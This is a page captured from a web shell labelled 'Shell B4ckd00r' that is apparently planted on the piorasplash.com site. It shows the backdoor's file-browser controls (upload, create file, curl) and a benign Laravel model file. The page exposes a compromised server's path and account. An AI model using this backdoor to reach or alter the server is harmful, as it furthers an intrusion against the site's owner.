Shell B4ckd00r
Current Dir :
/
home
/
u789730693
/
domains
/
piorasplash.com
/
public_html
/
app
/
Models
/
Home
Upload
Create Dir
Create File
Curl
Current File : /home/u789730693/domains/piorasplash.com/public_html/app/Models/AnalyticSection.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class AnalyticSection extends Model { use HasFactory; protected $table = "analytic_sections"; protected $fillable = ['analytic_id', 'name', 'data', 'section']; protected $casts = [ 'id' => 'integer', 'analytic_id' => 'integer', 'name' => 'string', 'data' => 'string', 'section' => 'integer', ]; public function analytic(): \Illuminate\Database\Eloquent\Relations\BelongsTo { return $this->belongsTo(Analytic::class); } }
v.01